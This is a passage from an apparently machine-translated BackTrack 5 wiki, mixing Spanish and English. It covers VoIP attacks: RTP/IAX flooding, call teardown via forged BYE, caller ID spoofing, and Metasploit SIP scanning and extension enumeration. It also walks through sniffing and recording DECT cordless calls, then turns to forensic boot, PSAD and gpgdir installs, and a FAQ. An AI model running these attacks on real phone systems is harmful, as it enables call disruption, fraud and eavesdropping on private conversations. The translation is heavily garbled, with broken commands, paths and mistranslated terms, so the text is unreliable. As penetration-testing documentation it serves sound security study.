successful attack using rtpflood you will need know the RTP listening port on the remote device you want
to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID

Iaxflood
IAXFlood es una herramienta para inundar el protocolo IAX2 que es utilizado por el asterisco PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets

Teardown
Teardown se utiliza para terminar una llamada mediante el envo de una peticin BYE
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id

value.
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105; sucursal = z9hG4bKkfnyfaol, recibido = 192.168.1.105; rport =
5060
De: "200" ;tag=hcykd
Para: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTRO
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE
Compatible con: sustituye
Expira: 3600
Contacto: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0

Si se especifica la opcin "-v" opcin se puede ver la carga til:


SIP carga til para paquetes:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9; sucursal = 91ca1ba5-98ee-44d5-9170-61c30981c565
De: <sip:192.168.1.104>; tag = hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>

Spoofing Caller ID
Existen varios mtodos para la identificacin de llamadas spoofing que no vamos a discutir aqu, ya que
requiere un conjunto diferente de herramientas y equipos que no son relevantes para este propsito
artculo. Caller ID Spoofing en SIP es bastante fcil, slo tiene que cambiar la peticin SIP "INVITE" de
cabecera.
INVITE sip:@127.0.0.1 SIP/2.0
A: <sip:192.168.1.104>
Via: 192.168.1.104 SIP/2.0/UDP
De: "Hacker Evil"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
Contact: <sip:127.0.0.1>

Vamos a echar un vistazo a una herramienta que ya hemos discutido llamado Inviteflood que se puede

utilizar para enviar falsa invitar peticiones.


root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a
"Backtrack"

Attacking VoIP Using Metasploit


The Metasploit framework includes several auxiliaries and modules dedicated for VoIP exploitation.
Usted puede encontrarlos mediante la funcin de bsqueda con palabras clave como "sip" o "VoIP". Let's
Launch msfconsole and perform a search for available modules:
root @ bt: ~ # msfconsole
msf > search sip

Metasploit VoIP Modules


Here's a complete list of the available modules for you reference:
Auxiliaries
scanner/sip/enumerator - SIP Username Enumerator (UDP) scanner/sip/enumerator_tcp - SIP
Username Enumerator (TCP) scanner/sip/options - SIP Endpoint Scanner (UDP)
scanner/sip/options_tcp - SIP Endpoint Scanner (TCP) voip/sip_invite_spoof - SIP Invite Spoof
Exploits
windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq - SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
unix/webapp/trixbox_langchoice - Trixbox langChoice PHP Local File Inclusion

Scanning SIP Enabled Devices


Metasploit provides a sip scanner auxiliary which comes in two flavors TCP and UDP, we can use it to
discover SIP enabled devices using the OPTION method: Let's see an example of the UDP version:
scanner/sip/options auxiliary Auxiliary Options and Usage:
msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > show options
Opciones del mdulo auxiliar (/ escner / sip / opciones):
Name Current Setting Required Description
---- --------------- -------- ----------BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no La direccin local del cliente
CPORT 5060 no The local client port
Rhosts s la meta rango de direcciones CIDR o identificador
Rport 5060 yes El puerto de destino

Temas del 1 S El nmero de subprocesos simultneos


A nadie no el nombre de usuario de destino para sondear en cada host
msf auxiliary(options) > set RHOSTS 192.168.1.130/24
Rhosts => 192.168.1.130/24
msf auxiliary(options) > run
[*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS,
CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS,
CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS,
CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS,
CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS,
CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE,
REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Enumerating SIP extensions / Usernames


The scanner/sip/enumerator auxiliary can be used to discover valid SIP accounts, it supports two
methods of discovery: OPTIONS and REGISTER, it also comes in two flavors TCP and UDP. Auxiliary
options:
msf > use scanner/sip/enumerator
msf auxiliary(enumerator) > show options
Opciones del mdulo auxiliar (/ escner / sip / enumerador):
Name Current Setting Required Description
---- --------------- -------- ----------BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no La direccin local del cliente
CPORT 5060 no The local client port
MAXEXT 9999 s Ending extensin
MTODO DE REGISTRO s Mtodo de recuento de usar OPCIONES / REGISTER
MINEXT 0 yes Starting extension
PADLEN 4 s relleno Cero mxima longitud
Rhosts s la meta rango de direcciones CIDR o identificador
Rport 5060 yes El puerto de destino
Temas del 1 S El nmero de subprocesos simultneos

Ejemplo de uso:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf
auxiliary(enumerator) > set MINEXT 100 MINEXT => 100 msf auxiliary(enumerator) > set MAXEXT
500 MAXEXT => 500 msf auxiliary(enumerator) > set PADLEN 3 PADLEN => 3 msf
auxiliary(enumerator) > run [*] Found user: 200 <sip:200@192.168.1.104> [Auth] [*] Found user:
201 <sip:201@192.168.1.104> [Auth] [*] Found user: 202 <sip:202@192.168.1.104> [Auth] [*]
Found user: 203 <sip:203@192.168.1.104> [Auth] [*] Found user: 204 <sip:204@192.168.1.104>

[Auth] [*] Found user: 300 <sip:300@192.168.1.104> [Auth] [*] Scanned 1 of 1 hosts (100%
complete) [*] Auxiliary module execution completed

Spoofing Caller ID auxiliary


The voip/sip_invite_spoof auxiliary will create a fake SIP invite request making the targeted device ring
and display fake caller id information. Auxiliary Options:
msf > use voip/sip_invite_spoof
msf auxiliary(sip_invite_spoof) > show options
Opciones del mdulo auxiliar (/ voip / sip_invite_spoof):
Name Current Setting Required Description
---- --------------- -------- ----------El MSG Metasploit usted tiene s el identificador de llamadas falso para enviar
Rhosts s la meta rango de direcciones CIDR o identificador
Rport 5060 yes El puerto de destino
SRCADDR 192.168.1.1 si la direccin SIP a la llamada falsa proviene de
Temas del 1 S El nmero de subprocesos simultneos

Ejemplo de uso:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
Rhosts => 192.168.1.104
msf auxiliary(sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.104
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploiting VoIP systems


Metasploit incluye varios exploits para el software cliente SIP e incluso para la interfaz de administracin
web Trixbox PBX.
Although this is not a SIP specific vulnerability it is still related and can enable a full control by an
attacker on a PBX.

Closing Words
I hope you've found this document informative, please keep in mind that Backtrack Linux provides many
tools and features we haven't covered here. Take the time to browse the tools read the manuals and
README's I am sure you'll find the right tool for the job.
Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums we would love
to here your feedback ideas and experiences.

http://www.backtrack-linux.org/forums/

Sobre el autor
Shai rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk
Management in Israel; He holds the Offensive security OSCP and OSCE certifications (among others)
and manages his blog at http://exploit.co.il

Referencias
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/

DECT Sniffing Dedected

Este artculo fue contribuido por 5M7X.


URL: http://www.back-track.de/index.php?page=team # SMTX
Twitter: ! http://twitter.com/ # / 5M7X
Email: 5M7X@mail.ru
BIG FAT HAIRY ADVERTENCIA: ES ILEGAL grabar conversaciones telefnicas en muchos pases.
Para obtener una lista de las leyes de privacidad estatales en los EE.UU.,

Contenido
[hide]
1 Qu es
DECT?
1.1
El
pro
ble
ma
?
1.2
Pro
bad
o
en
2
Instalacin
dedected
2.1
Inst
alac
in
del
rep
osit
orio
2.2
Inst
alac
in
des
de
el
cd
igo
fue
nte
3 Instale
algunas
herramient
as
adicionales
4 Cargue
los
controlador
es
5 Escanear

Qu es DECT?
http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

El problema?
La mayora de los vendedores no implementar el cifrado en sus dispositivos, de forma que uno puede
olerlo con determinado hardware y software.
En un post anterior sobre el tema, consulte: http://www.offensive-security.com/backtrack/sniffing-dectphones-the-details/

Probado en
BackTrack 5 KDE ltimo kernel 2.6.38 con x86
Original Dosch y Amand Tipo II PCMCIA Card
SIEMENS C1 Telfonos DECT configurado en modo repetidor
NOTA: Este es un programa experimental que no est muy apoyado activamente ms!

Instalacin dedected
Con el fin de obtener dedected instalado en BackTrack, usted tiene las siguientes opciones:
1. Utilice dedected de los BackTrack 5 repositorios.
2. Compilar por su cuenta si usted quiere experimentar.

Instalar desde repositorio


root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get install dedected

Instalacin desde el cdigo fuente


Esta etapa es opcional para aquellos que quieran construir las herramientas de cdigo fuente.
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /
root @ bt: ~ # cd / pentest / telefona
root @ bt: ~ # svn co https://dedected.org/svn/trunk dedected_svn
root @ bt: ~ # cd dedected_svn / com-on-air_cs-linux /
root @ bt: ~ # make && make-C herramientas

Instale algunas herramientas adicionales


root @ bt: ~ # apt-get-y install audacia

Cargue los controladores


root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux
root @ bt: ~ # make nodo

Si no ha introducido su Dosch y tipo Amand 2 o Tipo 3 o Voo: doo # PCMCIA tarjeta hgalo ahora! A
continuacin, cargar el controlador:
root @ bt: ~ # make load

Analizar en busca de partes fijas aka fp (estaciones base DECT)


root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux / tools
root @ bt:. ~ # / dect_cli

Si necesita informacin sobre el tipo de uso "ayuda". Si usted vive en la cerradura de EE.UU. a los
EE.UU. / DECT 6 banda a travs de la "banda" de comandos. Vamos a permitir someverbosity:
verbo

Y empezar a buscar las estaciones base:


fpscan

Despus de escanear 2-3 veces a travs de todos los canales de desactivar la verbosidad, y detener la
exploracin:
verbo
detener

No haga caso de los telfonos que no quieren oler (por ejemplo,


sus vecinos!)
Iniciar un callscan
callscan

Ahora toma el telfono DECT y hacer una llamada de prueba y espere hasta que aparezca la llamada
telefnica. Asimismo, es suficiente si usted acaba de obtener un tono de marcacin. Debera ver algo
como
Llamada # # # encontrado nuevo 00 82 31 33 73 en el canal 7 RSSI 34
detener

El nombre de su estacin base si desea:


Nombre 00 82 31 33 73 stallowned

Volcar todos los telfonos se encuentran:


arrojar

No haga caso de todos los telfonos excepto el suyo a travs del siguiente comando! IMPORTANTE!
ignorar 01 30 95 13 37

Grabe la llamada telefnica


Comience automaticially registro de cada llamada telefnica que detecta:
AUTOREC

Ahora toma el telfono telefona DECT y hacer una Llamada prueba. Recomiendo llamar un "serivce
tiempo diciendo" que se puede llegar a travs de un nmero de telfono normal. Usted debe obtener algo
como esto:
# # # A partir AUTOREC
# # # Parando DIP
# # # A partir callscan
# # # Intentando sincronizar en ab b0 00 82 29
# # # Tiene sincronizacin
# # # Dumping dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
# # # Parando DIP

Despus de colgar tu llamada telefnica al vertimiento debera detenerse:

Decodificar la llamada de la corriente de datos


Detenga el AUTOREC:
detener

Decodificar el audiostream de la basura cruda


root @ bt:. ~ # / decode.sh

Importe los arroyos en audacia y escuchar las llamadas


Comience audacia a travs de "alt + f2" y escriba "audacia" y pulse Enter. Importe las partes fijas y
porttiles hte-parte de archivos wav / pentest / telefona / dedected / com-on-air_cs-linux / tools travs de
Archivo -.> Importar -> Audio o simplemente "ctrl + shift + I". Importar los archivos que terminan en.
Pcap_fp.ima.g721.wav y pcap_pp.ima.g721.wav..
Juega tu llamada telefnica con el botn de reproduccin:

Sugerencia: si slo se puede or el ruido del telfono parece utilizar algunos de codificacin / cifrado.
Puede activar el modo de repetidor en su telfono por lo que deshabilita el cifrado y se puede probar si su
configuracin est funcionando correctamente.

Limpiar / Recargar
Si tiene que volver a cargar los controladores

root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux


root @ bt: ~ # make recargar

Si ha terminado y desea limpiar:


root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux
root @ bt: ~ # make unload
root @ bt: ~ # rm / dev / coa

Protocolo DECT
Si usted est interesado en ms detalles del protocolo, puede abrir el archivo pcap en Wireshark.:

Video: Sniffing telfonos DECT con BackTrack 5

Oler los telfonos DECT con BackTrack desde SMTX .

Forensics

Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar
en los registros relacionados .

Forensics Boot

Forensics Boot
Desde BackTrack 4 y ahora BackTrack 5 te habrs dado cuenta de que tiene un Forensics
BackTrack BackTrack opcin pero qu es eso?

LiveCD y Forense

Durante mucho tiempo, ahora, Linux Live CD han sido muy tiles para fines de adquisicin forense en
los casos en que, por una razn u otra no se puede utilizar un bloqueador de escritura de hardware.
Cuando se configura no a las unidades de montaje automtico, y conocer un poco de la forma, un Linux
Live CD puede ser un bloqueador de software de escritura maravilloso. Para un CD de Linux en vivo
para ser considerado para este propsito, sin embargo, es de la mayor importancia que el uso de la CD en
vivo no altera en cualquier datos de cualquier manera. Esa es la razn principal por la que BackTrack se
puso en marcha en el pasado, BackTrack se montan automticamente los discos disponibles y utilizar las
particiones de intercambio cuando estn disponibles, al hacer esto BackTrack pudo causar todo tipo de
estragos, el cambio de los ltimos tiempos de montaje, la alteracin de datos en el disco, y as
sucesivamente . Pero como BackTrack 4 y ahora BackTrack 5 que no es el caso ms.
Cmo?
Por lo tanto, vamos a tener la primicia. Personas forenses son a menudo detallista y muy conservador, as
que cmo sabemos que es seguro de usar? Bueno, para empezar el BackTrack 5 CD en vivo se basa
fuera de Casper, y no contiene secuencias de comandos del sistema de archivos de montaje automtico en
absoluto. Los scripts de inicializacin del sistema se han modificado en el modo de arranque forense para
que BackTrack 5 no buscar o hacer uso de cualquier particin de swap que figuran en el sistema. Todos
estos scripts se han eliminado del sistema.
Verificacin:
Para probar esta funcionalidad, hemos probado esta modalidad de arranque con configuraciones de
hardware. Para cada prueba, se tom una instantnea antes MD5 de los discos del sistema, arranca en
modo de arranque BackTrack5 forense, verificado ningn sistema de archivos fueron montadas y swap
no estaba en uso, hizo una serie de actividades en el sistema, a continuacin, apague el sistema hacia
abajo y tom una instantnea despus de MD5. En la comparacin de las dos instantneas MD5, en cada
caso eran un partido, lo que demuestra ningn cambio en los discos se ha hecho.
Uso:
Cuando se utilizan con fines forenses Backtrack, asegrese de que no se esperar a que un arranque sin
supervisin. Arranque por defecto para Backtrack es el modo de arranque estndar, que utilizar las
particiones swap si estn presentes. Hay un retraso agradable sin embargo, por lo que tendr un montn
de tiempo para seleccionar el modo de arranque correcto. Tambin, por favor recuerde que esta es una
distribucin de Linux. Es altamente recomendable que se familiarice con Linux antes de usar este o
cualquier otro Live CD de Linux para propsitos forenses. Adems, asegrese de revisar las herramientas
forenses adicionales aadidos a Backtrack 5. Nos hemos concentrado en la adicin de imgenes y
herramientas de triage, pero si usted encuentra que uno de sus utilidades favoritas no est en su sitio, por
favor hganoslo saber para que podamos mirar en tener agreg.

Instalar PSAD

URL: http://www.nanotechfibers.com/
Twitter: ! http://twitter.com/ # / rickflores_

Email: nanoquetz9l@nanotechfibers.com

PSAD: Deteccin de intrusiones y anlisis de registros con


iptables
Qu est drogas psicoactivas?
PSAD es una coleccin de tres demonios del sistema livianos (dos demonios principales y un demonio
ayudante) que se ejecutan en mquinas Linux y analizar los mensajes de registro # iptables para detectar
escaneos de puertos y el trfico sospechosa. Una implementacin tpica consiste en ejecutar las drogas
psicoactivas en el firewall iptables donde # # tiene el acceso ms rpido a los datos de registro.
Proceso de instalacin:
Verificar md5sum, y la clave pblica:
root @ bt: ~ # cd / usr / local / src root @ bt: / usr / local / src # wget
http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2 root @ bt: / usr / local / src # wget
http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.md5 root @ bt: / usr / local / src # wget
http://cipherdyne.org / psad/download/psad-2.1.7.tar.bz2.asc root @ bt: / usr / local / src # wget
http://cipherdyne.org/public_key root @ bt: / usr / local / src # md5sum - c PSAD-2.1.7.tar.bz2.md5
PSAD-2.1.7.tar.bz2: root @ bt Aceptar: / usr / local / src # gpg - import public_key root @ bt: / usr /
local / src # gpg - verify PSAD-2.1.7.tar.bz2.asc # gpg: Firma hizo Mi 14 de julio 2010 06:01:06 PM
EDT uso de claves DSA ID 0D3E7410 # gpg: Good signature de "Michael Rash (La firma de clave
para cipherdyne . Proyectos ORG) <mbr@cipherdyne.org> "

Instale PSAD:
root @ bt: / usr / local / src # tar xfj PSAD-2.1.7.tar.bz2
root @ bt: / usr / local / src # cd PSAD-2.1.7
root @ bt:. / usr/local/src/psad-2.1.7 # / install.pl
# Te gustara instalar las ltimas firmas de
# http://www.cipherdyne.org/psad/signatures (y / n)? y

Comience PSAD:
Tenga en cuenta que recibir el siguiente error:
root @ bt :/ usr/local/src/psad-2.1.7 # / etc / init.d / PSAD inicio
PSAD inicio: [*] No se pudo encontrar electrnico, editar el archivo / etc / PSAD / psad.conf en / usr /
sbin / lnea PSAD 9679.

Para solucionar este problema tendremos que editar psad.conf ubicado en / etc / PSAD / y agregar una
direccin de correo electrnico de la siguiente manera:
root @ bt :/ usr/local/src/psad-2.1.7 # vim / etc / PSAD / psad.conf

Tambin puedes ver: Ms Referencias


Autor Bio: Mis pasiones son la nanoingeniera, Ruby programacin, explotacin de software,
explotar desarrollo, hacking hardware embebido. Tambin me gusta levantar pesas, natacin de
combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede
convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y
acondicionamiento fsico.

Instalar GPGDir

URL: http://www.nanotechfibers.com/
Twitter: ! http://twitter.com/ # / rickflores_
Email: nanoquetz9l@nanotechfibers.com

gpgdir - Encriptacin directorio recursivo con GnuPG


Cul es gpgdir?
gpgdir es un script de perl que utiliza el GnuPG CPAN :: Mdulo de interfaz para cifrar y descifrar los
directorios mediante una clave gpg especificado en ~ /. gpgdirrc.
Proceso de instalacin:
Verifique que la llave pblica:
root @ bt: ~ # cd / usr / local / src /
root @ bt: / usr / local / src # mkdir gpgdir
root @ bt: / usr / local / src # cd gpgdir /
root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/gpgdir/download/gpgdir1.9.5.tar.bz2
root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/gpgdir/download/gpgdir1.9.5.tar.bz2.asc
root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/public_key
root @ bt: / usr / local / src / gpgdir # gpg - import public_key
root @ bt: / usr / local / src / gpgdir # gpg - verify-gpgdir 1.9.5.tar.bz2.asc

Instale gpgdir:
root @ bt: / usr / local / src / # tar gpgdir xfj gpgdir-1.9.5.tar.bz2
root @ bt: / usr / local / src / gpgdir # cd gpgdir-1.9.5
root @ bt:. / usr/local/src/gpgdir/gpgdir-1.9.5 # / install.pl

Editar el archivo de configuracin para utilizar la clave GnuPG por defecto:


root @ bt: vim / usr / local / src / gpgdir

Tambin puedes ver: Ms Referencias


Autor Bio: Mis pasiones son la nanoingeniera, Ruby programacin, explotacin de software,
explotar desarrollo, hacking hardware embebido. Tambin me gusta levantar pesas, natacin de
combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede
convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y
acondicionamiento fsico.

UGS CONOCIDOS

Bugs conocidos en BackTrack


BackTrack 5 R1
Instalacin parece colgar en un 99%. Esto es un error cosmtico introducido por nosotros. Dale
tiempo, sigue siendo copiado!.
conductores rt2800usb son poco fiables. Algunas tarjetas de entrar en modo monitor, pero no
muestran y capturan los datos. Si este es su caso, intente compilar los controladores
personalizados de una rama compat-wireless. Para mosre

Preguntas ms frecuentes

Contenido
[hide]
1
BackTrack
Preguntas
frecuentes
2 Acabo de
instalar
BackTrack,
cul es la
contrasea
de root?
3 Por qu
mi parada
teclado
funciona
cuando
intento
escribir la
contrasea
?
4 Cmo
iniciar el
entorno
grfico?
BackTrack
5 Es libre
para
descargar?
6 Se
ofrecen
versiones
de 64 bits o
un gnomo
de
BackTrack
?
7 Qu
versin
debo
descargar?
8 Yo acabo
de quemar
mi iso y no
arranca?
9 Yo uso
Windows y

BackTrack Preguntas frecuentes


Acabo de instalar BackTrack, cul es la contrasea de root?
El instalador Ubiquity utiliza el nombre de usuario "root" y "Toor" password por defecto.
Tambin recomendamos que cambie esto tan pronto como haya reiniciado y comprobado que todo
funciona correctamente. Puede hacerlo emitiendo el siguiente comando y siguiendo las instrucciones.
passwd root

Por qu mi parada teclado funciona cuando intento escribir la


contrasea?
No, el teclado sigue funcionando.
Cuando escribe su contrasea en BackTrack, no se muestra nada en la pantalla. Esta es una medida de
seguridad para evitar que alguien "hombro" y ser capaz de ver el tiempo que su contrasea es, lo que hace
que sea ms difcil para alguien que usted sabe que adivinar la contrasea.

Cmo puedo iniciar el entorno grfico?


Despus de arrancar desde el DVD / USB o despus de entrar en una instalacin de disco duro, escriba el
siguiente comando
startx

Es gratis para descargar BackTrack?


S, y siempre lo ser.

Ofrecen una versin de 64 bits o gnomo de BackTrack?


S, ahora ofrecen 64 bits y 32 bits ISO, as como el apoyo a los dispositivos basados en ARM mviles.
Tanto la versin de 32 bits y 64 bits vienen con Gnome o KDE. Tambin puede utilizar Fluxbox como su
WM.

Qu versin debo descargar?


Le recomendamos que descargue BackTrack 5. Ya no apoyar ninguna otra versin.

Acabo de quemar mis iso y no arranca?


Los tres problemas ms comunes son la suma md5 es incorrecto, el programa que utiliz para grabar el
archivo. Iso o materiales baratos. Por favor revise estas tres cosas antes de pedir ayuda.

Yo uso Windows y no quiero meter la pata?


Backtrack se puede ejecutar como un entorno vivo dvd que no afectar a su instalacin de Windows en
modo alguno. Si ejecuta el instalador y se instala en el disco duro que son los responsables de particionar
su disco correctamente y seleccionar la unidad correcta o particin. Guas sobre los mtodos de
instalacin se puede encontrar en la pgina de instalacin .
Por favor, recuerde que las selecciones incorrectas completamente puede limpiar su disco duro y,
potencialmente, se va sin su Windows / instalaciones originales de Linux!
Considere esto como su nica advertencia!

He odo que es estpido que se ejecute como root?


Muchas de las herramientas de Backtrack necesite acceso de root para ejecutar. Backtrack es una
distribucin de pruebas de penetracin especializada. Confiamos en que nuestros usuarios conozcan los
riesgos de seguridad se ejecuta como el usuario root.

Cul es el "perfecto" laptop para correr marcha atrs en?


Cada versin de un perfecto es diferente. No hay equipo perfecto. Por favor, compruebe los foros donde
los usuarios publican sus reflexiones sobre los modelos de computadoras.
Por favor, recuerde que debe aadir la suya a la lista demasiado

Dnde est el manual de Backtrack?


No hay un manual. Tenemos escribir documentacin oficial sobre cmo instalar Backtrack y cmo
utilizar algunas de las herramientas ms exticos, sin embargo, no escribir guas sobre piratera
informtica en general. Tenemos un foro de la comunidad y una wiki que ambos contienen muchos
usuarios y tutoriales Dev Team presentados. Por favor recuerde revisar el manual de la seccin de la
pgina web para obtener ms informacin sobre la documentacin oficial.

Ofrecen algn tipo de formacin oficial?


Consulte nuestra ofensiva de Entrenamiento en Seguridad Web site para la Formacin BackTrack slo
oficial.

Dnde puedo encontrar ms informacin sobre BackTrack?


Mantngase al da con nuestro blog , revise nuestros foros y comprobar BackTrack Fixes aqu.

Por qu no puedo yo aadir los repositorios de Backtrack para


mi instalacin de Ubuntu o los repositorios de Ubuntu a mi
instalacin Backtrack?
Le recomendamos encarecidamente en contra de esta accin porque las herramientas de Backtrack se
construyen con muchas caractersticas personalizadas, bibliotecas y ncleo. No tenemos forma de saber
cmo se llevar a cabo de manera no distribucin Backtrack, adems de que muy pronto romper su
instalacin.
Adems, si desea aadir los repositorios de Ubuntu a tu Backtrack instalacin, con toda seguridad,
romper su instalacin Backtrack todo muy rpidamente.
Hacemos un montn de pruebas para asegurar que todos los paquetes en nuestro repo trabajarn juntos
sin causar problemas.
Si te decides por este curso de accin que usted lo hace bajo su propio riesgo y el equipo de marcha atrs
no ofrecer ningn apoyo de ninguna manera.

Quiero / necesidad de reconstruir el kernel, me puedes ayudar?


En primer lugar, es muy poco probable que realmente tienen la necesidad de hacer esto. En segundo
lugar, si usted necesita ayuda para reconstruir el kernel, entonces probablemente no deberas estar
hacindolo en primer lugar.
Hacemos un montn de pruebas para asegurar que todos los paquetes en nuestro trabajo repo con el
ncleo que la oferta y utilizando su propio ncleo no tenemos manera de saber lo que la compatibilidad
se romper. Nosotros no apoyamos esto y no ofrecen ayuda para aquellos que optan por seguir adelante y
reconstruir el kernel.
Lo siento, pero si usted todava siente que quiere / necesita para reconstruir el kernel por cualquier razn,
usted est por su cuenta. Nosotros no apoyamos esto y no ofrecen ninguna pregunta o respuesta de ayuda
de aquellos que deciden seguir adelante y reconstruir el kernel.

Por qu mis tarjetas de red aparecen cuando arranco?


BackTrack es una distribucin de pruebas de penetracin y como tales peticiones DHCP, etc entra en la
red durante el arranque suelen ser muy indeseable. Usted puede habilitar la red ejecutando el siguiente
comando:
/ Etc / init.d / networking inicio

Por qu no puedo utilizar BackTrack tarjeta inalmbrica "X"


dentro de VMWare o Virtualbox?
Cualquier software de virtualizacin slo puede utilizar las tarjetas de red inalmbrica USB como
dispositivos fsicos, todos los otros tipos de tarjetas inalmbricas son vistos como dispositivos virtuales
Ethernet y slo puede ser visto como un dispositivo inalmbrico por el anfitrin y no por el sistema
operativo invitado. As que si usted desea ejecutar BackTrack en VMWare o Virtualbox y tienen todas las
capacidades inalmbricas, asegrese de que est utilizando un dispositivo USB.

Por qu no ofrecer una imagen USB como lo hizo con las


versiones anteriores?
Las versiones anteriores requieren a veces bastante complicado mtodos para instalar en una memoria
USB, por lo que por conveniencia hemos proporcionado imgenes especiales para facilitar la instalacin.
Con las ltimas ediciones de BackTrack hemos eliminado esa necesidad, ya que fcilmente se puede
instalar en una memoria USB con herramientas como Unetbootin o mediante mtodos manuales que se
describen en la instalacin de este sitio.

Cmo puedo contactar con usted?


A decir verdad, en la mayora de los casos que realmente no necesitan.
En primer lugar considerar esto, cada uno de nosotros recibimos cientos de correos electrnicos y
mensajes privados tanto en los foros y en nuestro canal de IRC cada da. Casi todos estos mensajes son de
personas que hacen preguntas simples que estn bien cubiertos en este wiki, FAQ o en el foro mismo.
Casi todos y cada uno de ellos es una cuestin que debe plantearse en el foro , ya que o bien se cubran, o
la pregunta y su respuesta posterior sera de beneficio para toda la comunidad y no slo la persona que
solicite la misma. Pinsalo de esta manera, si usted est haciendo esta pregunta, no tendra sentido que
alguien ms puede tener la misma pregunta o Ya ha formulado. El foro y wiki son valiosas fuentes de
informacin y que la informacin es slo tan buena como las preguntas formuladas y las respuestas.
En segundo lugar, todo el equipo son voluntarios, ninguno de nosotros se les paga para trabajar en el
proyecto y todos tenemos vidas, familia, trabajo, etc, fuera de BackTrack. Todos damos nuestro tiempo
libre al proyecto y ms de lo que se recoge responder a estas preguntas es menos tiempo tenemos que
trabajar en hacer BackTrack incluso mejor de lo que es.
As que en resumen, si su pregunta no cae en la descripcin anterior, entonces es en su inters no enviar
por correo electrnico o enviar un mensaje privado. Es muy probable que simplemente se ignora si se
incluir en esta categora.
Sin embargo, si hay algo no contemplado en el anterior, entonces por todos los medios se comunica con
nosotros.
Usted puede encontrar todos los el equipo de desarrollo en nuestro canal de IRC (recordar que no
vivimos all todo el tiempo), en los foros o los datos de contacto en el Acerca pgina del sitio web .

Dnde est el canal de IRC que est hablando?


Si usted desea unirse a la comunidad y contribuir, vistenos en irc.freenode.net, en el canal # backtracklinux. Nuestra pgina web seguir siendo la fuente principal de todas las noticias y novedades sobre
BackTrack. Asegrese de ver a nuestras reglas del canal leer el tpico del canal y recuerden que deben ser
registrados para hablar.
Importante: root (raz * * @ *) est prohibida por defecto en este canal, as que por favor asegrese de
configurar su cliente de irc adecuadamente.

Soy nuevo en linux, es BackTrack un buen lugar para empezar?


Lo sentimos, la respuesta simple a esto es no.
